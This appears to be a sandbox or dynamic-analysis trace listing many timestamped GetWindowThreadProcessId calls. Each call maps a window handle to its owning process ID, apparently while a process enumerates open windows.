	[0631.245] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xb04
	[0631.245] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x910
	[0631.245] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x230
	[0631.245] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xac0
	[0631.246] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xab4
	[0631.246] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xaac
	[0631.246] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x3d0
	[0631.246] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x978
	[0631.246] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xa7c
	[0631.246] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x59c
	[0631.246] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xa88
	[0631.246] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xa6c
	[0631.246] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xa68
	[0631.246] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x9f8
	[0631.246] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xa04
	[0631.247] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x924
	[0631.247] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x8dc
	[0631.247] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x7dc
	[0631.247] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x768
	[0631.247] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x764
	[0631.247] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x820
	[0631.247] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x810
	[0631.247] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x794
	[0631.247] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x83c
	[0631.247] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x7ac
	[0631.248] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xb44
	[0631.248] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xb5c
	[0631.248] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x838
	[0631.248] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0631.248] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0631.248] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0631.248] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0631.248] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0631.248] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0631.248] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0631.249] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0631.249] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x818
	[0631.249] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x5b8
	[0631.249] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x494
	[0631.249] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1ec
	[0631.249] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x440
	[0631.249] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x7e8
	[0631.249] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x730
	[0631.249] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x2c8
	[0631.249] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x31c
	[0631.250] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x330
	[0631.250] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x128
	[0631.250] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x5c8
	[0631.250] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x6f8
	[0631.250] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x358
	[0631.250] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x73c
	[0631.250] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xb0
	[0631.250] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x250
	[0631.250] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x240
	[0631.250] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x790
	[0631.251] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x61c
	[0631.251] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x540
	[0631.251] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x538
	[0631.251] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x568
	[0631.251] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x538
	[0631.251] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x568
	[0631.251] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x538
	[0631.251] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x540
	[0631.251] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x540
	[0631.251] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x57c
	[0631.251] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x460
	[0631.252] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x554
	[0631.252] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0631.252] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x528
	[0631.252] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0631.252] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0631.252] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0631.252] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x79c
	[0631.252] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0631.252] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4e0
	[0631.252] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0631.253] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x460
	[0631.253] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x460
	[0631.253] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x44c
	[0631.253] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x778
	[0631.253] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x460
	[0631.253] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x558
	[0631.253] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0631.253] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x4d0
	[0631.253] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1bb4
	[0631.254] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x10bc
	[0631.254] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1b50
	[0631.254] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x14b4
	[0631.254] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x149c
	[0631.254] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x14a8
	[0631.254] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1490
	[0631.254] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x14a4
	[0631.254] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x148c
	[0631.254] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1458
	[0631.254] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1b4c
	[0631.255] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1b3c
	[0631.255] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x19bc
	[0631.255] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x199c
	[0631.255] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1998
	[0631.255] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1994
	[0631.255] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1990
	[0631.255] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1984
	[0631.255] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x197c
	[0631.255] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1978
	[0631.255] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1824
	[0631.256] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1088
	[0631.256] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1908
	[0631.256] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x18cc
	[0631.256] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x18d0
	[0631.256] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1840
	[0631.256] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x10c4
	[0631.256] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x128c
	[0631.256] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x16e8
	[0631.256] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x16cc
	[0631.256] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x274
	[0631.257] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x10e0
	[0631.257] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x10cc
	[0631.257] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x10c0
	[0631.257] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x10d0
	[0631.257] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1198
	[0631.257] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1080
	[0631.257] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1074
	[0631.258] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x106c
	[0631.258] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1474
	[0631.258] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1414
	[0631.258] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xbd0
	[0631.258] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x550
	[0631.258] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xa38
	[0631.258] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x16d0
	[0631.258] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x16d4
	[0631.258] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x15bc
	[0631.258] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x15a0
	[0631.259] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x159c
	[0631.259] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1598
	[0631.259] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1594
	[0631.259] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1590
	[0631.259] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x158c
	[0631.259] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1588
	[0631.259] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1584
	[0631.259] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1580
	[0631.259] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x157c
	[0631.260] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1488
	[0631.260] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1404
	[0631.260] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x11b8
	[0631.260] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xbd4
	[0631.260] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xe0c
	[0631.260] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xd30
	[0631.260] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xe70
	[0631.260] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x13b8
	[0631.260] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xe20
	[0631.260] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xe2c
	[0631.260] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xe00
	[0631.261] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xe04
	[0631.261] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xc94
	[0631.261] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x13b0
	[0631.261] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x13ac
	[0631.261] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x13a8
	[0631.261] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1374
	[0631.261] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x132c
	[0631.261] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1328
	[0631.261] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x12d0
	[0631.261] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x12cc
	[0631.262] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x12c8
	[0631.262] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1290
	[0631.262] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1218
	[0631.262] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1214
	[0631.262] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x11ec
	[0631.262] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x11e8
	[0631.262] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x11cc
	[0631.262] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x1140
	[0631.262] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xe6c
	[0631.262] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0x6e8
	[0631.263] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xc6c
	[0631.263] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xf94
	[0631.263] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xffc
	[0631.263] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xf74
	[0631.263] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xf08
	[0631.263] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xf0c
	[0631.263] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xed8
	[0631.263] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xe90
	[0631.263] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xea8
	[0631.263] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xfa8
	[0631.264] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xfbc
	[0631.264] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xfb8
	[0631.264] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xfb4
	[0631.264] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xfb0
	[0631.264] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xfac
	[0631.264] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x1ed6c0 | out: lpdwProcessId=0x1ed6c0) returned 0xfc0
